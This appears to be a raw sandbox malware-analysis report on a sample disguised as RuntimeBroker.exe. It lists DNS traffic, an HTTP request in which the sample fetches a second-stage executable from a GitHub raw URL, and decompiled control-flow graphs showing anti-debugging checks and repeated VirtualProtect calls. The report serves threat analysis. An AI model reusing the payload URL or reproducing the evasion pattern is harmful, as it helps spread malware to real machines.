                                            Mar 29, 2025 14:00:37.304069042 CET1.1.1.1192.168.2.50x1185No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:37.304069042 CET1.1.1.1192.168.2.50x1185No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:37.304069042 CET1.1.1.1192.168.2.50x1185No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:39.026340961 CET1.1.1.1192.168.2.50x99d9Name error (3)35.56.3.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                            Mar 29, 2025 14:00:44.754340887 CET1.1.1.1192.168.2.50x7badName error (3)c2a9c95e369881c67228a6591cac2686.clo.footprintdns.comnonenoneA (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:44.859985113 CET1.1.1.1192.168.2.50x4532No error (0)ax-ring.ax-9999.ax-msedge.netax-9999.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Mar 29, 2025 14:00:44.859985113 CET1.1.1.1192.168.2.50x4532No error (0)ax-9999.ax-msedge.net150.171.28.254A (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:44.859985113 CET1.1.1.1192.168.2.50x4532No error (0)ax-9999.ax-msedge.net150.171.27.254A (IP address)IN (0x0001)false
                                            • github.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549712140.82.114.44437788C:\Users\user\Desktop\RuntimeBroker.exe
                                            TimestampBytes transferredDirectionData
                                            2025-03-29 13:00:36 UTC113OUTGET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1
                                            Host: github.com
                                            Connection: Keep-Alive
                                            2025-03-29 13:00:37 UTC562INHTTP/1.1 302 Found
                                            Date: Sat, 29 Mar 2025 13:00:37 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 0
                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With
                                            Access-Control-Allow-Origin:
                                            Location: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe
                                            Cache-Control: no-cache
                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                            X-Frame-Options: deny
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 0
                                            Referrer-Policy: no-referrer-when-downgrade
                                            2025-03-29 13:00:37 UTC3476INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75
                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu


                                            0246810s020406080100

                                            Click to jump to process

                                            0246810s0.00102030MB

                                            Click to jump to process

                                            • File
                                            • Registry
                                            • Network

                                            Click to dive into process behavior distribution

                                            Target ID:0
                                            Start time:09:00:34
                                            Start date:29/03/2025
                                            Path:C:\Users\user\Desktop\RuntimeBroker.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\RuntimeBroker.exe"
                                            Imagebase:0xbc0000
                                            File size:79'392 bytes
                                            MD5 hash:61FD0424631FC50F17989C516950935E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Execution Graph

                                            Execution Coverage

                                            Dynamic/Packed Code Coverage

                                            Signature Coverage

                                            Execution Coverage:15.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:3.8%
                                            Total number of Nodes:79
                                            Total number of Limit Nodes:3
                                            Show Legend
                                            Hide Nodes/Edges
                                            execution_graph 9923 5848c06 9924 5848c0f 9923->9924 9927 5848684 9924->9927 9926 5848c9b 9928 5849630 CloseHandle 9927->9928 9930 584969e 9928->9930 9930->9926 9931 584ef80 9932 584efc4 CheckRemoteDebuggerPresent 9931->9932 9933 584f006 9932->9933 9949 584fad0 9950 584fb13 TerminateProcess 9949->9950 9951 584fb41 9950->9951 9952 5848d20 9953 5848d21 9952->9953 9954 5849615 CloseHandle 9953->9954 9955 5848df7 9953->9955 9969 584902c 9953->9969 9962 584969e 9954->9962 9964 5848eac 9955->9964 9983 584869c 9955->9983 9957 5848f3b 9960 584869c VirtualProtect 9957->9960 9963 5848f4e 9960->9963 9961 584869c VirtualProtect 9961->9964 9965 584869c VirtualProtect 9963->9965 9964->9957 9964->9961 9971 5848f74 9965->9971 9966 584869c VirtualProtect 9966->9964 9967 584869c VirtualProtect 9967->9969 9968 5849027 9969->9954 9969->9967 9973 5849118 9969->9973 9970 584869c VirtualProtect 9970->9971 9971->9968 9971->9970 9972 584869c VirtualProtect 9974 5849498 9972->9974 9973->9954 9975 58493c1 9973->9975 9977 584869c VirtualProtect 9973->9977 9974->9954 9979 584950d 9974->9979 9975->9954 9975->9972 9976 584869c VirtualProtect 9982 5849549 9976->9982 9978 5849373 9977->9978 9980 584869c VirtualProtect 9978->9980 9979->9976 9980->9975 9981 584869c VirtualProtect 9981->9982 9982->9968 9982->9981 9984 58496d0 VirtualProtect 9983->9984 9986 5848e5a 9984->9986 9986->9966 9934 58411c8 9937 58411c9 9934->9937 9935 5841a68 VirtualProtect 9936 5841aa2 9935->9936 9943 584195d 9937->9943 9945 584081c 9937->9945 9940 584081c VirtualProtect 9941 5841377 9940->9941 9942 584081c VirtualProtect 9941->9942 9941->9943 9942->9943 9943->9935 9944 584196e 9943->9944 9946 584081d VirtualProtect 9945->9946 9948 584134b 9946->9948 9948->9940 9987 5842db8 9988 5842db9 9987->9988 9991 5842e6d 9988->9991 9989 5842dc3 9992 5842e70 9991->9992 9996 5842e90 9992->9996 10004 5842ea0 9992->10004 9993 5842e79 9993->9989 9997 5842ea0 9996->9997 9999 58438b1 9997->9999 10012 5840c0c 9997->10012 9999->9993 10000 5840c0c GetFileAttributesW 10001 5843869 10000->10001 10001->9999 10002 5840c0c GetFileAttributesW 10001->10002 10002->9999 10003 5843218 10003->9999 10003->10000 10005 5842ea1 10004->10005 10006 5840c0c GetFileAttributesW 10005->10006 10007 58438b1 10005->10007 10008 5843218 10006->10008 10007->9993 10008->10007 10009 5840c0c GetFileAttributesW 10008->10009 10010 5843869 10009->10010 10010->10007 10011 5840c0c GetFileAttributesW 10010->10011 10011->10007 10013 5844100 GetFileAttributesW 10012->10013 10015 584417f 10013->10015 10015->10003

                                            Executed Functions

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1810 58411c8-584120b 1815 584120d-5841214 1810->1815 1816 584122a-584122c 1810->1816 1817 5841a0a-5841aa0 VirtualProtect 1815->1817 1818 584121a-5841228 1815->1818 1819 584122f-584128b 1816->1819 1826 5841aa2-5841aa8 1817->1826 1827 5841aa9-5841aca 1817->1827 1818->1819 1819->1817 1829 5841291-58412b7 1819->1829 1826->1827 1829->1817 1832 58412bd-58412e3 1829->1832 1832->1817 1834 58412e9-5841307 1832->1834 1834->1817 1836 584130d-5841396 call 584081c * 2 1834->1836 1836->1817 1847 584139c-58413a8 1836->1847 1848 58414e5-58414f3 1847->1848 1849 58413ad-58413d6 1848->1849 1850 58414f9-5841528 1848->1850 1851 58413d8-58413e2 1849->1851 1852 5841429-5841436 1849->1852 1865 58415f4-5841600 1850->1865 1853 58413e4-58413f0 1851->1853 1854 58413f2-58413fb 1851->1854 1855 584143c-5841446 1852->1855 1856 58414de-58414e2 1852->1856 1858 58413fe-584140d 1853->1858 1854->1858 1859 5841456-584145f 1855->1859 1860 5841448-5841454 1855->1860 1856->1848 1861 5841416-5841419 1858->1861 1862 584140f-5841414 1858->1862 1863 5841462-5841478 1859->1863 1860->1863 1866 584141c-5841424 1861->1866 1862->1866 1867 58414d3-58414dc 1863->1867 1868 5841606-5841612 1865->1868 1869 584152d-584153e 1865->1869 1866->1856 1867->1856 1870 584147a-58414d2 1867->1870 1868->1817 1871 5841618-5841627 1868->1871 1869->1817 1872 5841544-5841565 1869->1872 1870->1867 1871->1817 1874 584162d-584164e 1871->1874 1872->1817 1875 584156b-58415f1 1872->1875 1874->1817 1876 5841654-5841660 1874->1876 1875->1865 1876->1817 1877 5841666-584167c 1876->1877 1877->1817 1878 5841682-584168e 1877->1878 1878->1817 1879 5841694-58416a9 1878->1879 1879->1817 1880 58416af-58416bb 1879->1880 1880->1817 1881 58416c1-58416d6 1880->1881 1881->1817 1882 58416dc-58416e8 1881->1882 1882->1817 1883 58416ee-5841704 1882->1883 1883->1817 1884 584170a-5841716 1883->1884 1884->1817 1885 584171c-5841731 1884->1885 1885->1817 1886 5841737-5841743 1885->1886 1886->1817 1887 5841749-584176a 1886->1887 1887->1817 1888 5841770-584177c 1887->1888 1888->1817 1889 5841782-5841798 1888->1889 1889->1817 1890 584179e-58417aa 1889->1890 1890->1817 1891 58417b0-58417c5 1890->1891 1891->1817 1892 58417cb-58417d7 1891->1892 1892->1817 1893 58417dd-58417f2 1892->1893 1893->1817 1894 58417f8-5841804 1893->1894 1894->1817 1895 584180a-5841820 1894->1895 1895->1817 1896 5841826-5841832 1895->1896 1896->1817 1897 5841838-584184d 1896->1897 1897->1817 1898 5841853-584185f 1897->1898 1898->1817 1899 5841865-584187a 1898->1899 1899->1817 1900 5841880-584188c 1899->1900 1900->1817 1901 5841892-584189f 1900->1901 1901->1817 1902 58418a5-58418b1 1901->1902 1902->1817 1903 58418b7-58418c3 1902->1903 1903->1817 1904 58418c9-58418d5 1903->1904 1904->1817 1905 58418db-58418e7 1904->1905 1905->1817 1906 58418ed-58418f9 1905->1906 1906->1817 1907 58418ff-5841911 1906->1907 1907->1817 1908 5841917-5841939 1907->1908 1910 5841945-5841958 call 584081c 1908->1910 1911 584193b 1908->1911 1913 584195d-584196c 1910->1913 1911->1910 1914 584197d-5841985 1913->1914 1915 584196e-5841978 call 5840828 1913->1915 1916 58419dd-5841a00 1914->1916 1919 5841a02-5841a09 1915->1919 1918 5841987-5841995 1916->1918 1916->1919 1918->1817 1921 5841997-58419b4 1918->1921 1921->1817 1922 58419b6-58419d1 1921->1922 1922->1817 1923 58419d3-58419da 1922->1923 1923->1916
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: $@
                                            • API String ID: 544645111-1077428164
                                            • Opcode ID: 6beee2770e0c2f7fda3e595f6ccea652f3799a28a3bbf6ea9df7f18b3548c405
                                            • Instruction ID: b4200d73268ef6c76a5e9d2928f3130f247f4e1ef7e3f1ca17c5ff68c0046de6
                                            • Opcode Fuzzy Hash: 6beee2770e0c2f7fda3e595f6ccea652f3799a28a3bbf6ea9df7f18b3548c405
                                            • Instruction Fuzzy Hash: 5252A074E002598FCB24CF59C984B9EBBF2FF48310F5581A9E859AB261E734AD81CF51
                                            APIs
                                              • Part of subcall function 0584869C: VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            • CloseHandle.KERNEL32 ref: 0584968F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CloseHandleProtectVirtual
                                            • String ID: ntin$ue
                                            • API String ID: 3173283821-3378103365
                                            • Opcode ID: c372f886099f6e2004b97da7369f7364511561f64ef0d0c391bb03ef035ec42a
                                            • Instruction ID: 6ab462b0407e6909b7f4bcf9021d133316fbce17892b948aab006e527924a49c
                                            • Opcode Fuzzy Hash: c372f886099f6e2004b97da7369f7364511561f64ef0d0c391bb03ef035ec42a
                                            • Instruction Fuzzy Hash: 2D623D71A042298FDB24CFA9C880BAEBBF6BF44304F158099D949EB295E734DD81CF55

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3585 584ef80-584f004 CheckRemoteDebuggerPresent 3587 584f006-584f00c 3585->3587 3588 584f00d-584f041 3585->3588 3587->3588
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 772cd0b09099efb513571a7078b29e55b3e3a22dbaef28c4b818f68364114364
                                            • Instruction ID: 282637eb83db56eb298e907ec9fabd688fce7a96f9ddfd6be95a6d64300718e6
                                            • Opcode Fuzzy Hash: 772cd0b09099efb513571a7078b29e55b3e3a22dbaef28c4b818f68364114364
                                            • Instruction Fuzzy Hash: 632125B1801259CFDB10CF9AD884BEEFBF8EF49320F14845AE955A3250D378A944CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "vn
                                            • API String ID: 0-4119310160
                                            • Opcode ID: c54866b0b3a5f165147df4d89d6cc27c19fe0fec0d812ea91f1de4178e9fbaac
                                            • Instruction ID: e0c20fd97ac5c1a4d6893bdc39ac0ac21573bb4784d66805620f359dce30bc7c
                                            • Opcode Fuzzy Hash: c54866b0b3a5f165147df4d89d6cc27c19fe0fec0d812ea91f1de4178e9fbaac
                                            • Instruction Fuzzy Hash: 1FB1B130B142099FDB24DB74D854B6EBBB7FB88300F148069E906EB295DB799C45CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vln
                                            • API String ID: 0-2884392432
                                            • Opcode ID: d68ba0da712b2d39ac2abd70937f5481043730b9cd14f16f6e3be1b21e5dd8c0
                                            • Instruction ID: 7a643e8d4961bef327dcc1a9d52bbc02b3a7e0732bcdd79e05809f2b0ad2bce3
                                            • Opcode Fuzzy Hash: d68ba0da712b2d39ac2abd70937f5481043730b9cd14f16f6e3be1b21e5dd8c0
                                            • Instruction Fuzzy Hash: 43B12770E0021DCBDB10CFAAC8857AEBBF2BB89714F148129DC55EB294EB759845CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "vn
                                            • API String ID: 0-4119310160
                                            • Opcode ID: 5989db784af211dbace0e29e3e344cbc8248dfafea12ec22df92b1fdf8e59856
                                            • Instruction ID: 93b7e79e9c19fe9292e888d787c2fd6dd4e89c614da0eaa520ce8ee9978ec02c
                                            • Opcode Fuzzy Hash: 5989db784af211dbace0e29e3e344cbc8248dfafea12ec22df92b1fdf8e59856
                                            • Instruction Fuzzy Hash: 11A1A030B042099FDB24DB78D854B6EBBB6FB88300F548069E906EB294DF799C44CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vln
                                            • API String ID: 0-2884392432
                                            • Opcode ID: e10f59c8922505d045ddea2db966fa73499fb6b60745e347559d7cffed8aaaca
                                            • Instruction ID: d4df958f8127b4a1ea1a163c93e058c169b5e2d6c39e4f95fa8e131cacbea01b
                                            • Opcode Fuzzy Hash: e10f59c8922505d045ddea2db966fa73499fb6b60745e347559d7cffed8aaaca
                                            • Instruction Fuzzy Hash: 7F912970E0060D9FDB14CFAAC9857ADBBF2BB89314F248129EC15E7294EB749845CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d32d5caa4743838b3aad56c2d9fde3df0647bb41bac9041421c1b54a98362d3
                                            • Instruction ID: b35cfd3da1429d7561e0db50307a873e4a395bb0e6958d3724382b6821a06a2a
                                            • Opcode Fuzzy Hash: 2d32d5caa4743838b3aad56c2d9fde3df0647bb41bac9041421c1b54a98362d3
                                            • Instruction Fuzzy Hash: 8F72BF34A081199FCB14CBA9D4809BDFBF2FF84305F19856AE856DB256C634DD82CFA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0eb7a15a38e74d65d1c60e120e45c9221dea26530dfcfce8dd0e2afc2036ad4
                                            • Instruction ID: f42a7830555fc1a0f4703bf010fe6316cfdb989446a7eba26211bc4d7485cd56
                                            • Opcode Fuzzy Hash: b0eb7a15a38e74d65d1c60e120e45c9221dea26530dfcfce8dd0e2afc2036ad4
                                            • Instruction Fuzzy Hash: F1E12736600210AFDB058FA4C954E6ABBB3FF8C714F0684E8E6095F272CA36DC55DB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35c88a97375312218930978b43f332ec04b5895c5acd57a48c4ee2a67e908a30
                                            • Instruction ID: e6aa321840b29e2b45813e858139d0f64691b69be2dc6158c4c94ceb17c4ae74
                                            • Opcode Fuzzy Hash: 35c88a97375312218930978b43f332ec04b5895c5acd57a48c4ee2a67e908a30
                                            • Instruction Fuzzy Hash: 9EE11636600210AFDB059FA4C954E6ABBB3FF8C714F1684E8E6095F271CA32DC55DB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcd60470f9786441cce1ee71bd0d3653bbede405fa8d3f8007d4ab0dc4991c22
                                            • Instruction ID: 59128e67ab2a09b1b757d2a76c6c911eef75e0372b7a2ae9e99cd18a35aaeb7b
                                            • Opcode Fuzzy Hash: bcd60470f9786441cce1ee71bd0d3653bbede405fa8d3f8007d4ab0dc4991c22
                                            • Instruction Fuzzy Hash: 41B12670E0420D9BDB14CFA9C8857AEBBF2FB88314F148129DC15E7294EB74A846CF95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3568 58407ff-584081a 3571 584081c 3568->3571 3572 584081d-5841aa0 VirtualProtect 3568->3572 3571->3572 3575 5841aa2-5841aa8 3572->3575 3576 5841aa9-5841aca 3572->3576 3575->3576
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 498f5acd6dce4bf4c4e270f771a09a518e68762078eca7d463492688b2ae8dd7
                                            • Instruction ID: 75b37d6d43187de002b060d3dd220d26e94aa363b722812f71cb2b11ca1dff08
                                            • Opcode Fuzzy Hash: 498f5acd6dce4bf4c4e270f771a09a518e68762078eca7d463492688b2ae8dd7
                                            • Instruction Fuzzy Hash: F2218C71D053598FCB00CFA9C444ADEBFF4EF48320F10806AE954A7201D3389945CFA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3578 584ef79-584f004 CheckRemoteDebuggerPresent 3581 584f006-584f00c 3578->3581 3582 584f00d-584f041 3578->3582 3581->3582
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 9952c5cd48d50202bb3a52b48b56ef92a3f09aa9985da0fc5cf5cbe46ca94d6f
                                            • Instruction ID: fc31181232999ec1f411f2f4b507b5ecca4bad510d75aa562c3b1d7456b1772e
                                            • Opcode Fuzzy Hash: 9952c5cd48d50202bb3a52b48b56ef92a3f09aa9985da0fc5cf5cbe46ca94d6f
                                            • Instruction Fuzzy Hash: E22136B18012598FCB10CF9AD884BEEFBF4AF48320F14855AE965B3290D3389944CF60

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3591 5848699-584869f 3592 58486a1 3591->3592 3593 58486a2-5849750 VirtualProtect 3591->3593 3592->3593 3596 5849752-5849758 3593->3596 3597 5849759-584977a 3593->3597 3596->3597
                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: a2ec1e6ecdf95f5404d773a4f718f1cba7f75ad6d12934e4b42ad4ebbdb385cd
                                            • Instruction ID: 44d22b55a2ff4a1befbfcb379a16c64173f3ae210f34f254b53232aa5d5416cd
                                            • Opcode Fuzzy Hash: a2ec1e6ecdf95f5404d773a4f718f1cba7f75ad6d12934e4b42ad4ebbdb385cd
                                            • Instruction Fuzzy Hash: 3F21E3B590464D9FCB10CF9AC884BEFFBF5EB48320F108029E958A7251D778A944CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3599 58496c8-5849750 VirtualProtect 3602 5849752-5849758 3599->3602 3603 5849759-584977a 3599->3603 3602->3603
                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: e644dcb128cecb3eafb134c2c623d14351097516ee2da86d970ffc5982efd400
                                            • Instruction ID: a93b67b09fa74e6308c9e1e6a4196e954be9941bae64ca6cc88d58455118aaf7
                                            • Opcode Fuzzy Hash: e644dcb128cecb3eafb134c2c623d14351097516ee2da86d970ffc5982efd400
                                            • Instruction Fuzzy Hash: EE21F7759016499FCB10CF9AD885BDFFBF4EF48320F108429E958A7251D778AA44CFA1
                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 5c6cc1bd6bef227759870243106ea6947d1593c6c7e6276d03c7884bbc52fcf6
                                            • Instruction ID: d65d5129f3e5114cddb8e9ad82794519a14810ddf0dc3bcc48070e0886ba5591
                                            • Opcode Fuzzy Hash: 5c6cc1bd6bef227759870243106ea6947d1593c6c7e6276d03c7884bbc52fcf6
                                            • Instruction Fuzzy Hash: 0521F2B590464D9FCB20CF9AC484BDEFBF5FB48320F108029E968A7251D378A944CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3605 584081c-5841aa0 VirtualProtect 3609 5841aa2-5841aa8 3605->3609 3610 5841aa9-5841aca 3605->3610 3609->3610
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 4eaf6bf6d7798e28145c3297f0dd2a6f6bbf5bb37b06083e0b36db36aa689b7c
                                            • Instruction ID: b4638239e995bb299d28572b2be97f4688b1e6330e772557b24b99fae2b00ad6
                                            • Opcode Fuzzy Hash: 4eaf6bf6d7798e28145c3297f0dd2a6f6bbf5bb37b06083e0b36db36aa689b7c
                                            • Instruction Fuzzy Hash: 1721F475D046499FCB10CF9AC484BDEFBF5FB48320F108429E958A7251D378A944CFA1
                                            APIs
                                            • TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProcessTerminate
                                            • String ID:
                                            • API String ID: 560597551-0
                                            • Opcode ID: 8c244d38d1ffd790c703f8ed807f1fc66124eb9e0418e5d7b9622dd5d49eb87f
                                            • Instruction ID: 2fd90efc0f14ed3857621a1d3b8a33c7323b0842f8290634874e05d935e03a52
                                            • Opcode Fuzzy Hash: 8c244d38d1ffd790c703f8ed807f1fc66124eb9e0418e5d7b9622dd5d49eb87f
                                            • Instruction Fuzzy Hash: 511126B18016499FDB20CF9AD845BDEFBF5EB48320F108429E958A7340C738A944CFA1
                                            APIs
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 05844170
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 7f13e8138c1791259c1140d5bd3784a20a901d6bb4fde308a7b72904709a4917
